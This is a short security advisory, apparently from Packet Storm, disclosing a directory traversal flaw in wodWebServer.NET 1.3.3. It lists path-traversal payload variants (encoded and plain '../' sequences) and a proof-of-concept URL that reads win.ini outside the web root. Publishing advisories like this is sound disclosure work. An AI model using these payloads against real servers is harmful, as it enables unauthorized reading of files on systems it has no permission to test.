A directory traversal vulnerability in wodWebServer.NET version 1.3.3 can be exploited to read files outside of the web root.
808b9c99fe76c207b01940a1506d3a27ab6b89ba66993fc79f2234e50ed86d4c------------------------------------------------------------------------
Software................wodWebServer.NET 1.3.3
Vulnerability...........Directory Traversal
Threat Level............Serious (3/5)
Download................https://www.weonlydo.com/WebServer.NET/web-http-net-server.asp
Vendor Contact Date.....3/13/2011
Disclosure Date.........3/27/2011
Tested On...............Windows Vista
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................https://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
A directory traversal vulnerability in wodWebServer.NET 1.3.3 can be
exploited to read files outside of the web root.
--Exploit--
..%5C/
..%2F/
..%2E/
..\/
..//
.../
..\
../
--PoC--
https://localhost/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/windows%5C/win.ini
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed